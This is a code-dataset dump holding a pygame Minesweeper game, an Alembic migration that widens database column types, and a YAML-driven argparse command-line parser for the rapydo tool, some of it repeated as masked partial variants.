'clear'\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n self.mouse_x = 0 # Stores x-coordinate of mouse event\n self.mouse_y = 0 # Stores y-coordinate of mouse event\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n 
self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n\n while True:\n left_click = False\n right_click = False\n\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n self.create_menu()\n\n font = pygame.font.SysFont(\"times new roman\", 25)\n\n # Timer (will be used to implement high scores)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n\n # Mouse event handling\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit() # Even if the window closes, we still need to manually stop the processes\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos # For hovering info\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1: # Left click\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3: # Right click\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n\n # If user decided to start over, reinitialize game\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n\n # TODO tweak spacing on text\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n\n a_x = X_BOARD_MARGIN + ((GRID_WIDTH / 4) * CELL_SIDE_LENGTH)\n b_y = Y_BOARD_MARGIN + (Y_BOARD_MARGIN / 4) + (GRID_HEIGHT * CELL_SIDE_LENGTH) + (GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont(\"times new roman\", 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 
75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None: # If mouse is hovering over a cell during mouse event\n\n # Highlight cell\n if not self.revealed_cells[cell_x][cell_y] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n\n # Digging somewhere\n if not self.revealed_cells[cell_x][cell_y] and left_click and not self.game_over:\n\n # So you can't accidentally click a flagged/question mark space\n if not self.flags[cell_x][cell_y] and not self.questionmarks[cell_x][cell_y]:\n\n self.flags[cell_x][cell_y] = False\n\n if self.board[cell_x][cell_y][0] == MINE: # If you dig a mine, reveal all cells & game over\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n\n elif self.board[cell_x][cell_y][0] == CLEAR: # If you dig a clear cell, reveal that cell\n self.reveal_cells(cell_x, cell_y, self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n else:\n self.revealed_cells[cell_x][cell_y] = True # Set the cell as revealed\n\n # Redraw board after mouse event\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # Placing a flag- if flag already there, change flag to question mark.\n # If question mark already there, turn to nothing. 
If nothing there, turn on flag\n if not self.revealed_cells[cell_x][cell_y] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n\n # Flag is drawn in this method call\n self.draw_board(self.board, self.revealed_cells, self.flags, self.questionmarks)\n\n # This block decides whether or not the player has won yet after a mouse event\n win = True\n for x in range(GRID_WIDTH): # If a cell is a mine and not flagged, or if a cell is clear\n for y in range(GRID_HEIGHT): # but not revealed, then the game is not yet over\n if (self.board[x][y][0] == MINE and not self.flags[x][y]) or (\n self.board[x][y][0] != MINE and not self.revealed_cells[x][y]):\n win = False\n\n if win:\n self.game_over = True\n\n # Redraw the screen and wait for clock tick\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n\n # Bottom of board is made of only mines and clear cells, which is then selectively covered for gameplay\n # Making randomized array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n\n # Create static under-board\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0] # so the next icon[0] is the one after this\n board.append(column)\n\n # This block determines how many mines are around each cell, and adds the number to the board's array\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n\n if x > 0:\n if y > 0: # If not on the left edge AND not on top edge\n if board[x - 1][y - 
1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n\n if x < GRID_WIDTH - 1:\n if y > 0: # If not on right edge AND not on top edge\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n\n if y > 0: # If not on right or left edge AND not on top edge\n if board[x][y - 1][0] == MINE:\n mines += 1\n\n if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge\n if board[x][y + 1][0] == MINE:\n mines += 1\n\n # If the cell is clear and there are mines around it, add the number of mines to board array\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = (str(mines), WHITE)\n\n return board\n\n # Used to show full board on game over & reset board on game start\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n # Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n # Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y): # If currently hovering over a cell\n return cell_x, cell_y\n return None, None # If not currently hovering over a cell\n\n # Redraws board after mouse event\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in 
range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n\n # Symbols not added on board creation must be drawn here: \"unrevealed\" boxes, flags, and question marks\n if not revealed[cell_x][cell_y]:\n # Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell\n # top point, bottom left point, bottom right point\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),\n (left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),\n (left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +\n CELL_SIDE_LENGTH - CELL_MARGIN/2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(\"?\", 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n else: # Draw revealed cells\n shape, color = self.get_shape_and_color(board, cell_x, cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n # Draws icon passed to it in the stated cell\n def draw_icon(self, shape, color, cell_x, cell_y):\n\n # Relative point of quarter-way through cell\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n\n left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner\n\n # Draw the shapes\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n\n # Flag shape & question mark in draw_board because they are activated via mouse event\n\n else: # Clear with num\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n 
fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont(\"times new roman\", fontsize)\n label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes \"1\", \"2\", etc.\n SURFACE.blit(label, (left + quarter, top))\n\n # Returns the shape and color of icon to be created in draw_icon method\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n # shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n\n # Draws a box around the cell the mouse is hovering over, 'highlighting' it\n def highlight_cell(self, cell_x, cell_y):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n # Changes with cell size, but line width is hard-set at 2px (last argument)\n pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),\n CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)\n\n # Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]: # If the cell is already revealed, do nothing\n return\n if flags[x][y]: # If the cell already has a flag on it, do nothing\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)\n\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)\n\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n\n if y < 
GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont(\"times new roman\", 20)\n label = font.render(\" High scores\", 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\ng = Game()\ng.main()\n",
"step-ids": [
10,
16,
17,
21,
22
]
}
|
[
10,
16,
17,
21,
22
] |
"""empty message
Revision ID: 6374505f9e6e
Revises: 9dc91bb7d2ba
Create Date: 2016-11-14 10:55:08.418923
"""
# revision identifiers, used by Alembic.
revision = '6374505f9e6e'
down_revision = '9dc91bb7d2ba'
from alembic import op
import sqlalchemy as sa
import sqlalchemy.types as ty
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('run', 'polarion_id', type_=ty.String(65535))
op.alter_column('auto_result', 'skip', type_=ty.Text())
op.alter_column('auto_result', 'failure', type_=ty.Text())
op.alter_column('auto_result', 'comment', type_=ty.Text())
op.alter_column('manual_result', 'comment', type_=ty.Text())
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.alter_column('run', 'polarion_id', type_=ty.String(1024))
op.alter_column('auto_result', 'skip', type_=ty.String(65535))
op.alter_column('auto_result', 'failure', type_=ty.String(65535))
op.alter_column('auto_result', 'comment', type_=ty.String(65535))
op.alter_column('manual_result', 'comment', type_=ty.String(65535))
### end Alembic commands ###
|
normal
|
{
"blob_id": "7badb7c9f1e00dfc379468b7bd73a3f09bffe6de",
"index": 1191,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-3": "<mask token>\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\n<mask token>\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-4": "<mask token>\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy.types as ty\n\n\ndef upgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n\n\ndef downgrade():\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n",
"step-5": "\"\"\"empty message\n\nRevision ID: 6374505f9e6e\nRevises: 9dc91bb7d2ba\nCreate Date: 2016-11-14 10:55:08.418923\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '6374505f9e6e'\ndown_revision = '9dc91bb7d2ba'\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy.types as ty\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('run', 'polarion_id', type_=ty.String(65535))\n op.alter_column('auto_result', 'skip', type_=ty.Text())\n op.alter_column('auto_result', 'failure', type_=ty.Text())\n op.alter_column('auto_result', 'comment', type_=ty.Text())\n op.alter_column('manual_result', 'comment', type_=ty.Text())\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('run', 'polarion_id', type_=ty.String(1024))\n op.alter_column('auto_result', 'skip', type_=ty.String(65535))\n op.alter_column('auto_result', 'failure', type_=ty.String(65535))\n op.alter_column('auto_result', 'comment', type_=ty.String(65535))\n op.alter_column('manual_result', 'comment', type_=ty.String(65535))\n ### end Alembic commands ###\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
"""
Automatically create and parse commands
based on a YAML configuration file.
NOTE: we can't have a logger here,
before knowing the level of debug.
"""
import os
import sys
import argparse
from controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE
from controller.conf_utilities import load_yaml_file
from controller import log
class ArgParser:
def __init__(self, args=None):
if args is None:
args = sys.argv
self.current_args = {}
self.host_configuration = {}
# This method can raise ValueErrors
self.check_args(args)
# This method saves configuration objects in self
self.read_configuration()
# Arguments definition
parser = argparse.ArgumentParser(
prog=args[0], description=self.parse_conf.get('description')
)
# PARAMETERS
sorted_options = sorted(self.parse_conf.get('options', {}).items())
for option_name, options in sorted_options:
self.add_parser_argument(parser, option_name, options)
version_string = 'rapydo version {}'.format(__version__)
parser.add_argument('--version', action='version', version=version_string)
# Sub-parser of commands [check, init, etc]
main_command = self.parse_conf.get('action')
subparsers = parser.add_subparsers(
title='Available commands',
dest=main_command.get('name'),
help=main_command.get('help'),
)
subparsers.required = True
# ##########################
# COMMANDS
# BASE normal commands
mycommands = self.parse_conf.get('subcommands', {})
for command_name, options in sorted(mycommands.items()):
# Creating a parser for each sub-command [check, init, etc]
subparse = subparsers.add_parser(
command_name, help=options.get('description')
)
# controlcommands = options.get('controlcommands', {})
# # Some subcommands can have further subcommands
# [control start, stop, etc]
# if len(controlcommands) > 0:
# innerparser = subparse.add_subparsers(
# dest='controlcommand'
# )
# innerparser.required = options.get('controlrequired', False)
# for subcommand, suboptions in controlcommands.items():
# subcommand_help = suboptions.pop(0)
# # Creating a parser for each sub-sub-command
# # [control start/stop]
# innerparser.add_parser(subcommand, help=subcommand_help)
suboptions = options.get('suboptions', {}).items()
for option_name, suboptions in suboptions:
self.add_parser_argument(subparse, option_name, suboptions)
# ##########################
# Print usage if no arguments provided
if len(args) == 1:
parser.print_help()
sys.exit(1)
# ##########################
# Reading input parameters
# Partial parsing
# https://docs.python.org/3.4/library/argparse.html#partial-parsing
# Example
# https://gist.github.com/von/949337/
# self.current_args = parser.parse_args()
current_args_namespace, self.remaining_args = parser.parse_known_args(args[1:])
self.current_args = vars(current_args_namespace)
# custom commands as a separate parser
self.extra_parser = argparse.ArgumentParser(
description='Custom rapydo commands from your own configuration',
add_help=False,
usage='\n$ rapydo custom CUSTOM_COMMAND',
)
self.extra_command_parser = self.extra_parser.add_subparsers(
title='Available custom commands',
dest='custom',
help='list of custom commands',
)
self.extra_command_parser.required = True
# ##########################
if self.current_args.get("log_level", "DEPRECATED") != "DEPRECATED":
# Deprecated since version 0.7.0
log.warning(
"--log-level parameter is deprecated, set env variable LOGURU_LEVEL")
log.verbose("Parsed arguments: {}", self.current_args)
def add_parser_argument(self, parser, option_name, options):
params = self.prepare_params(options)
alias = params.pop('alias', None)
positional = params.pop('positional', False)
param_name = '--{}'.format(option_name)
if positional:
parser.add_argument(option_name, **params)
elif alias is None:
parser.add_argument(param_name, **params)
else:
parser.add_argument(param_name, '-{}'.format(alias), **params)
@staticmethod
def check_args(args):
# Check on format
for element in args:
if element.startswith('--') and '_' in element:
raise ValueError(
"Wrong \"{}\" option provided.\n".format(element)
+ "Arguments containing '_' are not allowed.\n"
+ "Use '-' instead\n"
)
# NOTE: the standard is to use only '-' separators for arguments
# beware: argparse converts them into '_' when you want to retrieve
def read_configuration(self):
# READ MAIN FILE WITH COMMANDS AND OPTIONS
self.parse_conf = load_yaml_file(
'argparser.yaml', path=os.path.dirname(os.path.realpath(__file__))
)
try:
# READ PROJECT INIT FILE: .projectrc
pinit_conf = load_yaml_file(
PROJECTRC, path=os.curdir, is_optional=True)
# Allow alternative for PROJECT INIT FILE: .project.yml
if len(pinit_conf) < 1:
pinit_conf = load_yaml_file(
PROJECTRC_ALTERNATIVE, path=os.curdir, is_optional=True)
except AttributeError as e:
log.exit(e)
self.host_configuration = pinit_conf.pop('project_configuration', {})
# Mix with parse_conf
for key, value in pinit_conf.items():
# value = pinit_conf.get(key, None)
if value is None:
continue
if not isinstance(value, dict):
# This is a first level option
if key in self.parse_conf['options']:
self.parse_conf['options'][key]['default'] = value
else:
print("\nUnknown parameter {} found in {}\n".format(key, PROJECTRC))
else:
# This is a second level parameter
if key not in self.parse_conf['subcommands']:
print("\nUnknown command {} found in {}\n".format(key, PROJECTRC))
else:
conf = self.parse_conf['subcommands'][key]['suboptions']
for subkey, subvalue in value.items():
if subkey in conf:
conf[subkey]['default'] = subvalue
else:
print("Unknown parameter {}/{} found in {}\n".format(
key, subkey, PROJECTRC))
@staticmethod
def prepare_params(options):
pconf = {}
default = options.get('default')
pconf['default'] = default
myhelp = "{} [default: {}]".format(options.get('help'), default)
pconf['help'] = myhelp
if options.get('type') == 'bool':
if default:
pconf['action'] = 'store_false'
else:
pconf['action'] = 'store_true'
else:
# type and metavar are allowed for bool
pconf['type'] = str
pconf['metavar'] = options.get('metavalue')
if 'alias' in options:
pconf['alias'] = options['alias']
if 'positional' in options:
pconf['positional'] = options['positional']
return pconf
|
normal
|
{
"blob_id": "94559d9fd296acd468c33d6b0541b974575b8852",
"index": 4119,
"step-1": "<mask token>\n\n\nclass ArgParser:\n <mask token>\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ArgParser:\n <mask token>\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n 
pconf['default'] = default\n myhelp = '{} [default: {}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-3": "<mask token>\n\n\nclass ArgParser:\n\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n self.current_args = {}\n self.host_configuration = {}\n self.check_args(args)\n self.read_configuration()\n parser = argparse.ArgumentParser(prog=args[0], description=self.\n parse_conf.get('description'))\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=\n version_string)\n main_command = self.parse_conf.get('action')\n subparsers = parser.add_subparsers(title='Available commands', dest\n =main_command.get('name'), help=main_command.get('help'))\n subparsers.required = True\n mycommands = self.parse_conf.get('subcommands', {})\n for command_name, options in sorted(mycommands.items()):\n subparse = subparsers.add_parser(command_name, help=options.get\n ('description'))\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n current_args_namespace, self.remaining_args = parser.parse_known_args(\n args[1:])\n self.current_args = vars(current_args_namespace)\n self.extra_parser = argparse.ArgumentParser(description=\n 'Custom rapydo commands from your own configuration', add_help=\n False, usage=\"\"\"\n$ rapydo custom CUSTOM_COMMAND\"\"\")\n self.extra_command_parser = self.extra_parser.add_subparsers(title=\n 'Available custom commands', dest='custom', help=\n 'list of custom commands')\n self.extra_command_parser.required = True\n if self.current_args.get('log_level', 'DEPRECATED') != 'DEPRECATED':\n log.warning(\n '--log-level parameter is deprecated, set env variable LOGURU_LEVEL'\n )\n log.verbose('Parsed arguments: {}', self.current_args)\n\n 
def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n 